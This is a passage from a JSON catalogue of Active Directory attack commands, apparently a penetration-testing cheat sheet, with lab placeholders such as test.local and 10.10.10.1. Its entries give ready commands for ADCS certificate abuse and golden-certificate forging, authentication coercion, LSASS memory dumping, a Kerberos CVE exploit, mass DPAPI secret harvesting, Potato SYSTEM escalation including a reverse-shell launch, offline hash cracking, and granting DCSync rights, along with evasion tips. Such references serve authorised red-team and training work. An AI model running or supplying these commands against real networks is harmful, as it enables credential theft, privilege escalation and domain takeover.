    674       "Execution"
    675     ],
    676     "nativeCategory": [
    677       "PrivEsc",
    678       "Exploitation"
    679     ],
    680     "command": "# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local",
    681     "description": "ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1",
    682     "mitre": [],
    683     "requires": [
    684       "Username",
    685       "Password"
    686     ],
    687     "services": [
    688       "LDAP",
    689       "ADCS"
    690     ],
    691     "references": [
    692       "https://github.com/ly4k/Certipy",
    693       "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723",
    694       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    695     ],
    696     "added": true
    697   },
    698   {
    699     "id": "wadcoms:Certipy-Find-Vulnerable",
    700     "toolId": "wadcoms:Certipy",
    701     "toolName": "Certipy",
    702     "name": "Certipy-Find-Vulnerable",
    703     "source": "DAEMON",
    704     "platform": [
    705       "Linux",
    706       "ActiveDirectory",
    707       "Windows"
    708     ],
    709     "capability": [
    710       "Enumeration",
    711       "Discovery"
    712     ],
    713     "nativeCategory": [
    714       "Enumeration",
    715       "Discovery"
    716     ],
    717     "command": "certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout",
    718     "description": "Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1",
    719     "mitre": [],
    720     "requires": [
    721       "Username",
    722       "Password"
    723     ],
    724     "services": [
    725       "ADCS",
    726       "LDAP"
    727     ],
    728     "references": [
    729       "https://github.com/ly4k/Certipy",
    730       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation",
    731       "https://www.thehacker.recipes/ad/movement/adcs/certificate-templates"
    732     ],
    733     "added": true
    734   },
    735   {
    736     "id": "wadcoms:Certipy-Forge-GoldenCert",
    737     "toolId": "wadcoms:Certipy",
    738     "toolName": "Certipy",
    739     "name": "Certipy-Forge-GoldenCert",
    740     "source": "DAEMON",
    741     "platform": [
    742       "Linux",
    743       "ActiveDirectory",
    744       "Windows"
    745     ],
    746     "capability": [
    747       "Persistence"
    748     ],
    749     "nativeCategory": [
    750       "Persistence"
    751     ],
    752     "command": "certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx",
    753     "description": "A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775",
    754     "mitre": [],
    755     "requires": [
    756       "PFX"
    757     ],
    758     "services": [
    759       "ADCS"
    760     ],
    761     "references": [
    762       "https://github.com/ly4k/Certipy",
    763       "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723",
    764       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    765     ],
    766     "added": true
    767   },
    768   {
    769     "id": "wadcoms:Certipy-ShadowCredentials",
    770     "toolId": "wadcoms:Certipy",
    771     "toolName": "Certipy",
    772     "name": "Certipy-ShadowCredentials",
    773     "source": "DAEMON",
    774     "platform": [
    775       "Linux",
    776       "ActiveDirectory",
    777       "Windows"
    778     ],
    779     "capability": [
    780       "Credential Access",
    781       "Privilege Escalation"
    782     ],
    783     "nativeCategory": [
    784       "Credential Access",
    785       "PrivEsc"
    786     ],
    787     "command": "certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim",
    788     "description": "Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1",
    789     "mitre": [],
    790     "requires": [
    791       "Username",
    792       "Password"
    793     ],
    794     "services": [
    795       "LDAP",
    796       "Kerberos",
    797       "ADCS"
    798     ],
    799     "references": [
    800       "https://github.com/ly4k/Certipy",
    801       "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab",
    802       "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"
    803     ],
    804     "added": true
    805   },
    806   {
    807     "id": "wadcoms:Coercer-Coerce",
    808     "toolId": "wadcoms:Coercer",
    809     "toolName": "Coercer",
    810     "name": "Coercer-Coerce",
    811     "source": "DAEMON",
    812     "platform": [
    813       "Linux",
    814       "ActiveDirectory",
    815       "Windows"
    816     ],
    817     "capability": [
    818       "Execution"
    819     ],
    820     "nativeCategory": [
    821       "Exploitation"
    822     ],
    823     "command": "Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2",
    824     "description": "Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
    825     "mitre": [],
    826     "requires": [
    827       "Username",
    828       "Password"
    829     ],
    830     "services": [
    831       "RPC",
    832       "NTLM"
    833     ],
    834     "references": [
    835       "https://github.com/p0dalirius/Coercer",
    836       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/"
    837     ],
    838     "added": true
    839   },
    840   {
    841     "id": "wadcoms:Coercer-Scan",
    842     "toolId": "wadcoms:Coercer",
    843     "toolName": "Coercer",
    844     "name": "Coercer-Scan",
    845     "source": "DAEMON",
    846     "platform": [
    847       "Linux",
    848       "ActiveDirectory",
    849       "Windows"
    850     ],
    851     "capability": [
    852       "Enumeration",
    853       "Discovery"
    854     ],
    855     "nativeCategory": [
    856       "Enumeration",
    857       "Discovery"
    858     ],
    859     "command": "Coercer scan -u john -p password123 -d test.local -t 10.10.10.1",
    860     "description": "Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
    861     "mitre": [],
    862     "requires": [
    863       "Username",
    864       "Password"
    865     ],
    866     "services": [
    867       "RPC",
    868       "NTLM"
    869     ],
    870     "references": [
    871       "https://github.com/p0dalirius/Coercer",
    872       "https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"
    873     ],
    874     "added": true
    875   },
    876   {
    877     "id": "wadcoms:Comsvcs-MiniDump-LSASS",
    878     "toolId": "wadcoms:Comsvcs",
    879     "toolName": "Comsvcs",
    880     "name": "Comsvcs-MiniDump-LSASS",
    881     "source": "DAEMON",
    882     "platform": [
    883       "Windows",
    884       "ActiveDirectory"
    885     ],
    886     "capability": [
    887       "Credential Access"
    888     ],
    889     "nativeCategory": [
    890       "Credential Access"
    891     ],
    892     "command": "# Get the LSASS PID first:  tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full",
    893     "description": "The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>",
    894     "mitre": [
    895       "T1003.001"
    896     ],
    897     "requires": [
    898       "Shell"
    899     ],
    900     "services": [
    901       "NTLM",
    902       "Kerberos"
    903     ],
    904     "references": [
    905       "https://lolbas-project.github.io/lolbas/Libraries/comsvcs/",
    906       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
    907       "https://attack.mitre.org/techniques/T1003/001/"
    908     ],
    909     "added": true
    910   },
    911   {
    912     "id": "wadcoms:CVE-2022-33679-Downgrade",
    913     "toolId": "wadcoms:CVE",
    914     "toolName": "CVE",
    915     "name": "CVE-2022-33679 Kerberos RC4-MD4 Downgrade",
    916     "source": "DAEMON",
    917     "platform": [
    918       "Linux",
    919       "ActiveDirectory",
    920       "Windows"
    921     ],
    922     "capability": [
    923       "Credential Access",
    924       "Execution"
    925     ],
    926     "nativeCategory": [
    927       "Credential Access",
    928       "Exploitation"
    929     ],
    930     "command": "# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache",
    931     "description": "CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache",
    932     "mitre": [],
    933     "requires": [
    934       "No_Creds"
    935     ],
    936     "services": [
    937       "Kerberos"
    938     ],
    939     "references": [
    940       "https://github.com/Bdenneu/CVE-2022-33679",
    941       "https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html",
    942       "https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"
    943     ],
    944     "added": true
    945   },
    946   {
    947     "id": "wadcoms:DFSCoerce",
    948     "toolId": "wadcoms:DFSCoerce",
    949     "toolName": "DFSCoerce",
    950     "name": "DFSCoerce",
    951     "source": "DAEMON",
    952     "platform": [
    953       "Linux",
    954       "ActiveDirectory",
    955       "Windows"
    956     ],
    957     "capability": [
    958       "Execution"
    959     ],
    960     "nativeCategory": [
    961       "Exploitation"
    962     ],
    963     "command": "python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1",
    964     "description": "DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
    965     "mitre": [],
    966     "requires": [
    967       "Username",
    968       "Password"
    969     ],
    970     "services": [
    971       "RPC",
    972       "NTLM"
    973     ],
    974     "references": [
    975       "https://github.com/Wh04m1001/DFSCoerce",
    976       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"
    977     ],
    978     "added": true
    979   },
    980   {
    981     "id": "wadcoms:DonPAPI-Collect",
    982     "toolId": "wadcoms:DonPAPI",
    983     "toolName": "DonPAPI",
    984     "name": "DonPAPI-Collect",
    985     "source": "DAEMON",
    986     "platform": [
    987       "Linux",
    988       "ActiveDirectory",
    989       "Windows"
    990     ],
    991     "capability": [
    992       "Credential Access",
    993       "Collection"
    994     ],
    995     "nativeCategory": [
    996       "Credential Access",
    997       "Collection"
    998     ],
    999     "command": "# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui",
   1000     "description": "DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   1001     "mitre": [],
   1002     "requires": [
   1003       "Username",
   1004       "Password"
   1005     ],
   1006     "services": [
   1007       "SMB"
   1008     ],
   1009     "references": [
   1010       "https://github.com/login-securite/DonPAPI",
   1011       "https://www.login-securite.com/2022/03/28/donpapi/"
   1012     ],
   1013     "added": true
   1014   },
   1015   {
   1016     "id": "wadcoms:EfsPotato-SeImpersonate",
   1017     "toolId": "wadcoms:EfsPotato",
   1018     "toolName": "EfsPotato",
   1019     "name": "EfsPotato-SeImpersonate",
   1020     "source": "DAEMON",
   1021     "platform": [
   1022       "Windows",
   1023       "ActiveDirectory"
   1024     ],
   1025     "capability": [
   1026       "Privilege Escalation",
   1027       "Execution"
   1028     ],
   1029     "nativeCategory": [
   1030       "PrivEsc",
   1031       "Exploitation"
   1032     ],
   1033     "command": "# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2",
   1034     "description": "EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = \\pipe\\efsrpc",
   1035     "mitre": [],
   1036     "requires": [
   1037       "Shell"
   1038     ],
   1039     "services": [
   1040       "RPC"
   1041     ],
   1042     "references": [
   1043       "https://github.com/zcgonvh/EfsPotato",
   1044       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"
   1045     ],
   1046     "added": true
   1047   },
   1048   {
   1049     "id": "wadcoms:GodPotato-SeImpersonate",
   1050     "toolId": "wadcoms:GodPotato",
   1051     "toolName": "GodPotato",
   1052     "name": "GodPotato-SeImpersonate",
   1053     "source": "DAEMON",
   1054     "platform": [
   1055       "Windows",
   1056       "ActiveDirectory"
   1057     ],
   1058     "capability": [
   1059       "Privilege Escalation",
   1060       "Execution"
   1061     ],
   1062     "nativeCategory": [
   1063       "PrivEsc",
   1064       "Exploitation"
   1065     ],
   1066     "command": "# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"",
   1067     "description": "GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege",
   1068     "mitre": [
   1069       "T1134.002"
   1070     ],
   1071     "requires": [
   1072       "Shell"
   1073     ],
   1074     "services": [
   1075       "DCOM",
   1076       "RPC"
   1077     ],
   1078     "references": [
   1079       "https://github.com/BeichenDream/GodPotato",
   1080       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato",
   1081       "https://attack.mitre.org/techniques/T1134/002/"
   1082     ],
   1083     "added": true
   1084   },
   1085   {
   1086     "id": "wadcoms:Hashcat-ASREPRoast",
   1087     "toolId": "wadcoms:Hashcat",
   1088     "toolName": "Hashcat",
   1089     "name": "Hashcat-ASREPRoast",
   1090     "source": "DAEMON",
   1091     "platform": [
   1092       "Linux",
   1093       "ActiveDirectory",
   1094       "Windows"
   1095     ],
   1096     "capability": [
   1097       "Credential Access"
   1098     ],
   1099     "nativeCategory": [
   1100       "Credential Access"
   1101     ],
   1102     "command": "# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show",
   1103     "description": "Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1104     "mitre": [
   1105       "T1558.004"
   1106     ],
   1107     "requires": [
   1108       "Hash"
   1109     ],
   1110     "services": [
   1111       "Kerberos"
   1112     ],
   1113     "references": [
   1114       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1115       "https://www.thehacker.recipes/ad/movement/kerberos/asreproast",
   1116       "https://attack.mitre.org/techniques/T1558/004/"
   1117     ],
   1118     "added": true
   1119   },
   1120   {
   1121     "id": "wadcoms:Hashcat-DCC2-mscash2",
   1122     "toolId": "wadcoms:Hashcat",
   1123     "toolName": "Hashcat",
   1124     "name": "Hashcat-DCC2-mscash2",
   1125     "source": "DAEMON",
   1126     "platform": [
   1127       "Linux",
   1128       "ActiveDirectory",
   1129       "Windows"
   1130     ],
   1131     "capability": [
   1132       "Credential Access"
   1133     ],
   1134     "nativeCategory": [
   1135       "Credential Access"
   1136     ],
   1137     "command": "# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show",
   1138     "description": "Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1139     "mitre": [
   1140       "T1003.005"
   1141     ],
   1142     "requires": [
   1143       "Hash"
   1144     ],
   1145     "services": [
   1146       "NTLM"
   1147     ],
   1148     "references": [
   1149       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1150       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz",
   1151       "https://attack.mitre.org/techniques/T1003/005/"
   1152     ],
   1153     "added": true
   1154   },
   1155   {
   1156     "id": "wadcoms:Hashcat-Kerberoast-TGSREP",
   1157     "toolId": "wadcoms:Hashcat",
   1158     "toolName": "Hashcat",
   1159     "name": "Hashcat-Kerberoast-TGSREP",
   1160     "source": "DAEMON",
   1161     "platform": [
   1162       "Linux",
   1163       "ActiveDirectory",
   1164       "Windows"
   1165     ],
   1166     "capability": [
   1167       "Credential Access"
   1168     ],
   1169     "nativeCategory": [
   1170       "Credential Access"
   1171     ],
   1172     "command": "# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show",
   1173     "description": "Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1174     "mitre": [
   1175       "T1558.003"
   1176     ],
   1177     "requires": [
   1178       "Hash"
   1179     ],
   1180     "services": [
   1181       "Kerberos"
   1182     ],
   1183     "references": [
   1184       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1185       "https://www.thehacker.recipes/ad/movement/kerberos/kerberoast",
   1186       "https://attack.mitre.org/techniques/T1558/003/"
   1187     ],
   1188     "added": true
   1189   },
   1190   {
   1191     "id": "wadcoms:Hashcat-NetNTLMv1",
   1192     "toolId": "wadcoms:Hashcat",
   1193     "toolName": "Hashcat",
   1194     "name": "Hashcat-NetNTLMv1",
   1195     "source": "DAEMON",
   1196     "platform": [
   1197       "Linux",
   1198       "ActiveDirectory",
   1199       "Windows"
   1200     ],
   1201     "capability": [
   1202       "Credential Access"
   1203     ],
   1204     "nativeCategory": [
   1205       "Credential Access"
   1206     ],
   1207     "command": "# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'",
   1208     "description": "Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1209     "mitre": [],
   1210     "requires": [
   1211       "Hash"
   1212     ],
   1213     "services": [
   1214       "NTLM"
   1215     ],
   1216     "references": [
   1217       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1218       "https://github.com/evilmog/ntlmv1-multi",
   1219       "https://crack.sh/netntlm/"
   1220     ],
   1221     "added": true
   1222   },
   1223   {
   1224     "id": "wadcoms:Hashcat-NetNTLMv2",
   1225     "toolId": "wadcoms:Hashcat",
   1226     "toolName": "Hashcat",
   1227     "name": "Hashcat-NetNTLMv2",
   1228     "source": "DAEMON",
   1229     "platform": [
   1230       "Linux",
   1231       "ActiveDirectory",
   1232       "Windows"
   1233     ],
   1234     "capability": [
   1235       "Credential Access"
   1236     ],
   1237     "nativeCategory": [
   1238       "Credential Access"
   1239     ],
   1240     "command": "# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show",
   1241     "description": "Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1242     "mitre": [
   1243       "T1110.002"
   1244     ],
   1245     "requires": [
   1246       "Hash"
   1247     ],
   1248     "services": [
   1249       "NTLM"
   1250     ],
   1251     "references": [
   1252       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1253       "https://www.thehacker.recipes/ad/movement/ntlm/capture",
   1254       "https://attack.mitre.org/techniques/T1110/002/"
   1255     ],
   1256     "added": true
   1257   },
   1258   {
   1259     "id": "wadcoms:Hashcat-NTLM-secretsdump",
   1260     "toolId": "wadcoms:Hashcat",
   1261     "toolName": "Hashcat",
   1262     "name": "Hashcat-NTLM-secretsdump",
   1263     "source": "DAEMON",
   1264     "platform": [
   1265       "Linux",
   1266       "ActiveDirectory",
   1267       "Windows"
   1268     ],
   1269     "capability": [
   1270       "Credential Access"
   1271     ],
   1272     "nativeCategory": [
   1273       "Credential Access"
   1274     ],
   1275     "command": "# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show",
   1276     "description": "Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1277     "mitre": [
   1278       "T1003.002"
   1279     ],
   1280     "requires": [
   1281       "Hash"
   1282     ],
   1283     "services": [
   1284       "NTLM"
   1285     ],
   1286     "references": [
   1287       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1288       "https://github.com/fortra/impacket/blob/master/examples/secretsdump.py",
   1289       "https://attack.mitre.org/techniques/T1003/002/"
   1290     ],
   1291     "added": true
   1292   },
   1293   {
   1294     "id": "wadcoms:Impacket-dacledit-DCSync",
   1295     "toolId": "wadcoms:Impacket-dacledit",
   1296     "toolName": "Impacket-dacledit",
   1297     "name": "Impacket-dacledit-DCSync",
   1298     "source": "DAEMON",
   1299     "platform": [
   1300       "Linux",
   1301       "ActiveDirectory",
   1302       "Windows"
   1303     ],
   1304     "capability": [
   1305       "Privilege Escalation",
   1306       "Persistence",
   1307       "Credential Access"
   1308     ],
   1309     "nativeCategory": [
   1310       "PrivEsc",
   1311       "Persistence",
   1312       "Credential Access"
   1313     ],
   1314     "command": "# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'",
   1315     "description": "Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john",
   1316     "mitre": [],
   1317     "requires": [
   1318       "Username",
   1319       "Password"
